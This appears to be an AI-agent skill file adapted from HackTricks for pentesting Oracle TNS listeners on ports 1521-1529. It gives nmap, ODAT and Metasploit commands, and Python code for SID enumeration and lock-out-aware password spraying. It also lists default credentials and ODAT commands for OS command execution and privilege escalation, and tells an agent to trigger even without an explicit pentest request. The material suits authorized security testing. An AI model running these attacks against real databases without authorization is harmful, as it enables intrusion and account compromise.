Hacktricks-skills oracle-tns-pentest

Pentest Oracle TNS Listener on ports 1521-1529. Use this skill whenever the user mentions Oracle database, TNS listener, port 1521, Oracle enumeration, or needs to assess Oracle database security. This includes version detection, SID enumeration, credential testing, and vulnerability assessment. Trigger even if the user doesn't explicitly say "pentest" or "Oracle" but mentions database ports 1521-1529 or Oracle services.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/SKILL.MD
source content

Oracle TNS Listener Pentesting

A comprehensive skill for assessing Oracle database security through TNS Listener enumeration and exploitation.

When to Use This Skill

Use this skill when:

  • You need to enumerate or test Oracle database services
  • Port 1521 (or 1522-1529) is open on a target
  • The user mentions Oracle, TNS, or database enumeration
  • You're doing network service pentesting and Oracle is in scope
  • You need to discover Oracle SIDs, versions, or test credentials

Quick Start

# Basic enumeration
./scripts/oracle-nmap-scan.sh <target-ip>

# Full ODAT enumeration
./scripts/odat-wrapper.sh <target-ip>

# SID bruteforce
./scripts/sid-bruteforce.sh <target-ip> <wordlist>

Pentesting Workflow

1. Version Enumeration

Identify Oracle version to search for known vulnerabilities.

# Using nmap
nmap --script "oracle-tns-version" -p 1521 -T4 -sV <target>

# Using ODAT
./odat all -s <target>

Why this matters: the listener's VERSION reply names the exact release (its VSNNUM field encodes the same version numerically), which lets you:

  • Search CVE databases and Oracle Critical Patch Update advisories for that release
  • Choose the Metasploit and ODAT modules that apply to it
  • Tell whether the release is out of support and therefore no longer receives security patches

2. TNS Listener Information

The TNS Listener is the entry point for Oracle connections. It typically runs on:

  • Primary: 1521/TCP
  • Secondary: 1522-1529/TCP (additional listeners, or the listener of a second instance on the same host)

# Check all common Oracle ports
nmap -p 1521-1529 --script "oracle-tns-version" <target>

On 10g and later listeners, remote administrative commands such as STATUS are normally refused with TNS-01189 (the listener could not authenticate the user), while VERSION and PING still answer. Version detection therefore works even where status enumeration of SIDs does not, and you fall back to guessing SIDs.

3. SID Name Enumeration

Discover database names (SID) that the listener serves.

# Using ODAT (recommended): guess SIDs, then service names (needed for 12c+ pluggable databases)
./odat sidguesser -s <target> -p 1521 --sids-file <wordlist>
./odat snguesser -s <target> -p 1521 --sn-file <wordlist>

# Using nmap: oracle-sid-brute uses its built-in nselib/data/oracle-sids list unless you pass your own
nmap --script "oracle-sid-brute" --script-args oraclesids=<wordlist> -p 1521 <target>

Common default SIDs to try:

  • ORCL, ORCLDB, ORCL11G, ORCL12C, ORCL19C
  • XE (Express Edition; its default pluggable database is reached through the service name XEPDB1, not a SID)
  • TEST, PROD, DEV, DB
  • The hostname itself

On 12c and later multitenant installs, pluggable databases are only reachable by service name (ORCLPDB1 is the DBCA default for ORCL), so guess service names as well as SIDs.
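The listener probes behind sections 2 and 3, as an added example that is not code from the hacktricks-skills page or from ODAT/nmap: a minimal TNS CONNECT-packet builder plus a reply classifier, which is the mechanism nmap's oracle-tns-version/oracle-sid-brute and ODAT's tnscmd/sidguesser implement. The wire layout follows the classic tnscmd.pl CONNECT packet; the VSNNUM decoding is the hex-nibble rule nmap's oracle-tns-version applies; the sample REFUSE packet and the script name tns_probe.py are constructed for illustration.

```python
# Added example (not from the hacktricks-skills page, ODAT or nmap): build a TNS
# CONNECT packet, send a listener command or a SID connect descriptor, and
# classify the reply. Layout follows the classic tnscmd.pl CONNECT packet.
import re
import socket
import struct

TNS_CONNECT, TNS_ACCEPT, TNS_REFUSE, TNS_REDIRECT, TNS_DATA, TNS_RESEND = 1, 2, 4, 5, 6, 11
HEADER_LEN = 8            # length(2) checksum(2) type(1) reserved(1) header checksum(2)
CONNECT_DATA_OFFSET = 58  # 8-byte header + 50-byte CONNECT body
PAYLOAD_SKIP = {TNS_REFUSE: 4, TNS_REDIRECT: 2, TNS_DATA: 2}  # bytes before the printable descriptor


def build_connect_packet(connect_data: str) -> bytes:
    """Return a TNS CONNECT packet carrying the given connect descriptor."""
    data = connect_data.encode()
    body = struct.pack(
        ">HHHHHHHHHHIBBIIQQ",
        0x0136, 0x012C,                   # protocol version 310, lowest compatible 300
        0x0C41, 0x0800, 0x7FFF,           # service options, SDU, TDU
        0x7F08, 0x0000, 0x0001,           # NT protocol characteristics, line turnaround, "1 in hardware"
        len(data), CONNECT_DATA_OFFSET,   # connect data length and its offset from packet start
        0x00000200,                       # max receivable connect data
        0x41, 0x41,                       # connect flags 0 and 1
        0, 0,                             # trace cross-facility items
        0, 0,                             # trace unique connection id, unused
    )
    total = HEADER_LEN + len(body) + len(data)
    return struct.pack(">HHBBH", total, 0, TNS_CONNECT, 0, 0) + body + data


def version_command() -> str:
    """Listener command descriptor, the same request `odat tnscmd --version` sends."""
    return "(CONNECT_DATA=(COMMAND=VERSION))"


def sid_descriptor(sid: str, host: str, port: int = 1521) -> str:
    """Ordinary database connect descriptor; the reply reveals whether the SID exists."""
    return (f"(DESCRIPTION=(CONNECT_DATA=(SID={sid})(CID=(PROGRAM=)(HOST=__jdbc__)(USER=)))"
            f"(ADDRESS=(PROTOCOL=TCP)(HOST={host})(PORT={port})))")


def decode_vsnnum(vsnnum: int) -> str:
    """VSNNUM packs the release as hex nibbles: 0x0A200100 -> 10.2.0.1.0 (nmap's rule)."""
    return "%d.%d.%d.%d.%d" % ((vsnnum >> 24) & 0xFF, (vsnnum >> 20) & 0xF,
                               (vsnnum >> 16) & 0xF, (vsnnum >> 8) & 0xFF, vsnnum & 0xFF)


def parse_reply(raw: bytes) -> dict:
    """Decode one listener packet: type, ERR code and VSNNUM when the payload carries them."""
    if len(raw) < HEADER_LEN:
        raise ValueError("short TNS packet")
    length, _, ptype, _, _ = struct.unpack(">HHBBH", raw[:HEADER_LEN])
    info = {"type": ptype, "text": "", "err": None, "version": None}
    skip = PAYLOAD_SKIP.get(ptype)
    if skip is not None:
        info["text"] = raw[HEADER_LEN + skip:length].decode("latin-1", "replace")
        m = re.search(r"\(ERR=(\d+)\)", info["text"])
        info["err"] = int(m.group(1)) if m else None
        m = re.search(r"\(VSNNUM=(\d+)\)", info["text"])
        info["version"] = decode_vsnnum(int(m.group(1))) if m else None
    return info


def classify_sid_reply(info: dict) -> str:
    """What a reply to sid_descriptor() means for SID enumeration."""
    if info["type"] in (TNS_ACCEPT, TNS_REDIRECT):
        return "valid"  # the listener knows the SID and hands us to a server process
    if info["type"] == TNS_REFUSE:
        return {12505: "unknown-sid", 12514: "unknown-service"}.get(info["err"], f"refused-{info['err']}")
    return f"unexpected-type-{info['type']}"


def tns_exchange(host: str, port: int, connect_data: str, timeout: float = 5.0) -> dict:
    """Send one CONNECT packet to a live listener and return the decoded reply."""
    pkt = build_connect_packet(connect_data)
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(pkt)
        info = parse_reply(s.recv(4096))
        if info["type"] == TNS_RESEND:            # listener asks for the CONNECT packet again
            s.sendall(pkt)
            info = parse_reply(s.recv(4096))
        if info["type"] == TNS_ACCEPT and "COMMAND=" in connect_data:
            info = parse_reply(s.recv(4096))      # listener commands are answered in a DATA packet after ACCEPT
    return info


def make_refuse(descriptor: str) -> bytes:
    """Constructed sample REFUSE packet in the listener's format, for offline tests."""
    data = descriptor.encode()
    body = struct.pack(">BBH", 0x22, 0x00, len(data)) + data  # user reason, system reason, data length
    return struct.pack(">HHBBH", HEADER_LEN + len(body), 0, TNS_REFUSE, 0, 0) + body


# Constructed sample of a 10.2.0.1 listener refusing an unknown SID (not a real capture)
SAMPLE_REFUSE = make_refuse("(DESCRIPTION=(TMP=)(VSNNUM=169869568)(ERR=12505)"
                            "(ERROR_STACK=(ERROR=(CODE=12505)(EMFI=4))))")

if __name__ == "__main__":
    import sys
    host, sid = sys.argv[1], sys.argv[2]   # usage: python3 tns_probe.py <target> <sid> (hypothetical file name)
    print("version:", tns_exchange(host, 1521, version_command())["version"])
    reply = tns_exchange(host, 1521, sid_descriptor(sid, host))
    print(sid, "->", classify_sid_reply(reply), reply["text"])
```

The point to notice is that a REFUSE with ERR=12505 is a positive result for enumeration: the listener is up and is telling you the SID is wrong, and its VSNNUM leaks the version even when STATUS is refused. Long connect descriptors and multi-packet DATA replies are not handled here; ODAT's tnscmd module does that.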

4. Credential Bruteforce

Once you have a SID, attempt to authenticate.

# Using ODAT: -d is the SID (-n for a service name), -U/-P are the database user and password, -p is the port
./odat all -s <target> -p 1521 -d <sid> -U <username> -P <password>

# With an accounts file (one user/password pair per line, e.g. system/manager)
./odat passwordguesser -s <target> -p 1521 -d <sid> --accounts-file <accounts.txt>

Common default credentials (user/password):

  • system/manager, system/system
  • sys/change_on_install, sys/sys (SYS must connect AS SYSDBA; ODAT has a --sysdba option)
  • scott/tiger, scott/scott
  • dbsnmp/dbsnmp, outln/outln

Mind the attempt count per account: the DEFAULT profile ships with FAILED_LOGIN_ATTEMPTS=10, so ten consecutive wrong passwords lock the account and turn a quiet test into a denial of service. ODAT's userlikepwd module (username as password) is a cheap first pass.
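Password guessing done with the lock-out threshold in mind, and the triage of the results that feeds the Troubleshooting section below, as an added example (not code from the hacktricks-skills page or from ODAT). It assumes the stock DEFAULT profile value FAILED_LOGIN_ATTEMPTS=10 and a constructed `user/password: message` result-line format; the account lists and result lines are constructed samples, not data from a real target.

```python
# Added example (not from the hacktricks-skills page or ODAT): plan a password
# spray that stays under Oracle's lock-out threshold, write it in the
# user/password-per-line format `odat passwordguesser --accounts-file` reads,
# and sort login results by ORA-/TNS- code. The threshold of 10 is the
# FAILED_LOGIN_ATTEMPTS value of a stock DEFAULT profile (an assumption: a
# target may use a stricter profile, so read dba_profiles once you have a login).
import re

DEFAULT_FAILED_LOGIN_ATTEMPTS = 10

# Constructed sample inputs (well-known default accounts, not a real target's data)
SAMPLE_USERS = ["system", "sys", "scott", "dbsnmp", "outln"]
SAMPLE_PASSWORDS = ["manager", "change_on_install", "tiger", "oracle", "password"]


def plan_guesses(users, passwords, lockout=DEFAULT_FAILED_LOGIN_ATTEMPTS, already_failed=0):
    """(user, password) pairs, username-as-password first, never more than
    lockout-1-already_failed attempts per user so no account gets locked."""
    budget = max(lockout - 1 - already_failed, 0)
    plan = []
    for user in users:
        candidates = [user] + [p for p in passwords if p != user]
        plan.extend((user, p) for p in candidates[:budget])
    return plan


def to_accounts_file(pairs) -> str:
    """Serialise for `odat passwordguesser --accounts-file`: one user/password per line."""
    return "".join(f"{u}/{p}\n" for u, p in pairs)


# Meaning of the codes a login attempt can come back with
ERROR_MEANING = {
    "ORA-01017": "invalid-credentials",
    "ORA-28000": "account-locked",           # stop guessing this user
    "ORA-28001": "valid-password-expired",   # password was right; Oracle wants it changed
    "ORA-28002": "valid-password-expiring",  # login succeeded, only a warning
    "ORA-12505": "unknown-sid",              # listener error, not an authentication error
    "ORA-12514": "unknown-service",
    "ORA-12541": "no-listener",
    "ORA-12170": "connect-timeout",
}


def classify_login(line: str) -> str:
    """Map one result line to a category; TNS-xxxxx uses the same numbers as ORA-xxxxx."""
    m = re.search(r"\b(ORA|TNS)-(\d{5})\b", line)
    if not m:
        return "success" if "connected" in line.lower() else "unknown"
    return ERROR_MEANING.get("ORA-" + m.group(2), "error-ORA-" + m.group(2))


def triage(result_lines):
    """Group `user/password: message` lines (constructed format) into what to do next."""
    out = {"valid": [], "locked": [], "invalid": [], "retry": []}
    for line in result_lines:
        creds, _, _ = line.partition(": ")
        cat = classify_login(line)
        if cat in ("success", "valid-password-expired", "valid-password-expiring"):
            out["valid"].append(creds)
        elif cat == "account-locked":
            out["locked"].append(creds.split("/")[0])
        elif cat == "invalid-credentials":
            out["invalid"].append(creds)
        else:
            out["retry"].append((creds, cat))  # listener/network problem, says nothing about the password
    return out


# Constructed sample result lines (not captured from a real target)
SAMPLE_RESULTS = [
    "system/manager: ORA-01017: invalid username/password; logon denied",
    "scott/tiger: ORA-28000: the account is locked",
    "dbsnmp/dbsnmp: ORA-28001: the password has expired",
    "outln/outln: ORA-12505: TNS:listener does not currently know of SID given in connect descriptor",
    "sys/change_on_install: connected",
]

if __name__ == "__main__":
    print(to_accounts_file(plan_guesses(SAMPLE_USERS, SAMPLE_PASSWORDS)), end="")
    print(triage(SAMPLE_RESULTS))
```

Two details matter in practice: ORA-28001 means the password was correct (the account is yours once you change the password, or usable as-is through tools that handle the prompt), and an ORA-12505/12514 line is a listener problem, so the credential pair has not been tested at all and should go back into the queue with the right SID or service name.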

5. Code Execution

If you gain access, attempt to execute code on the system.

# Using ODAT: OS command execution through a Java stored procedure (needs the Oracle JVM and CREATE PROCEDURE privileges);
# dbmsscheduler and externaltable are the alternatives when Java is unavailable
./odat java -s <target> -p 1521 -d <sid> -U <username> -P <password> --exec "<command>"
./odat dbmsscheduler -s <target> -p 1521 -d <sid> -U <username> -P <password> --exec "<command>"

# If the account lacks the privileges, try escalating first
./odat privesc -s <target> -p 1521 -d <sid> -U <username> -P <password> --dba-with-execute-any-procedure

# Using Metasploit (if installed): the Oracle admin modules need the ruby-oci8 gem and Oracle Instant Client
msfconsole -q
use auxiliary/admin/oracle/oracle_sql
set RHOSTS <target>
set SID <sid>
set DBUSER <username>
set DBPASS <password>
set SQL "select banner from v$version"
run

Tools Reference

ODAT (Oracle Database Attack Tool)

The primary tool for Oracle pentesting.

Installation:

# Download from https://github.com/quentinhardy/odat/releases/
tar -xvf odat-linux-libc2.12-x86_64.tar.gz
cd odat-libc2.12-x86_64/
chmod +x odat-libc2.12-x86_64

The standalone binary is called odat-libc2.12-x86_64 (a source checkout runs as odat.py instead); the commands on this page write it as ./odat for brevity, so substitute the name you actually have.

Common commands:

| Command | Purpose |
| --- | --- |
| odat all -s <target> | Full enumeration (add -d <sid> -U <user> -P <pass> to run every module with credentials) |
| odat tnscmd -s <target> --version / --status / --ping | Listener version, status and ping (status is usually refused on 10g+) |
| odat sidguesser -s <target> --sids-file <wordlist> | SID bruteforce |
| odat snguesser -s <target> --sn-file <wordlist> | Service-name bruteforce (pluggable databases) |
| odat passwordguesser -s <target> -d <sid> --accounts-file <file> | Test credentials (user/pass per line) |
| odat java -s <target> -d <sid> -U <user> -P <pass> --exec "<cmd>" | Execute OS commands |

Nmap Scripts

# Version detection
nmap --script "oracle-tns-version" -p 1521 <target>

# Service detection
nmap -sV -p 1521 <target>

# Brute force (with wordlists): oracle-brute needs the SID and takes the brute library's userdb/passdb arguments
nmap --script "oracle-brute" --script-args oracle-brute.sid=<sid>,userdb=users.txt,passdb=pass.txt -p 1521 <target>

Metasploit Integration

If you have Metasploit installed, these modules are available (the scanner modules speak raw TNS and need nothing extra; the admin modules need the ruby-oci8 gem and Oracle Instant Client):

  • auxiliary/scanner/oracle/tnslsnr_version
    - Listener version
  • auxiliary/scanner/oracle/sid_enum
    - Ask the listener for its SIDs (only works where STATUS is not refused)
  • auxiliary/scanner/oracle/sid_brute
    - SID bruteforce
  • auxiliary/scanner/oracle/tnspoison_checker
    - Check for the TNS Poison remote-registration weakness (CVE-2012-1675)
  • auxiliary/admin/oracle/oracle_login
    - Default credential check against a SID
  • auxiliary/admin/oracle/oracle_sql
    - Run an arbitrary SQL statement with known credentials

Requirements: See Oracle Pentesting Requirements

Safety and Ethics

Important: Only use these techniques on systems you have explicit authorization to test. Unauthorized access to databases is illegal.

Best practices:

  1. Get written authorization before testing
  2. Stay under the account lock-out threshold (FAILED_LOGIN_ATTEMPTS, 10 by default) so password guessing does not lock out legitimate users, and rate-limit listener probing
  3. Document all findings
  4. Report vulnerabilities responsibly
  5. Don't exfiltrate data during testing

Troubleshooting

Connection refused:

  • Verify the port is open:
    nmap -p 1521 <target>
  • Check if Oracle is running on the target
  • Try secondary ports 1522-1529

TNS-12541: TNS:no listener:

  • Nothing is listening on that port; the listener may not be running
  • Try the other ports in 1521-1529
  • Check firewall rules

ORA-12505: TNS:listener does not currently know of SID given in connect descriptor:

  • The SID you're trying doesn't exist (the listener is up, so this reply is itself useful for SID enumeration)
  • Use SID enumeration to find valid SIDs

ORA-12514: TNS:listener does not currently know of service requested in connect descriptor:

  • The same situation for a service name; on 12c+ pluggable databases are only reachable by service name, so enumerate service names too

Authentication failed:

  • ORA-01017 (invalid username/password): try different credentials
  • ORA-28000 (the account is locked): stop guessing that account; ten consecutive failures lock it under the DEFAULT profile
  • ORA-28001 (the password has expired): the password was correct and the account exists, but Oracle demands a change before use
  • Verify the SID or service name is correct (ORA-12505/ORA-12514 are listener errors, not authentication errors)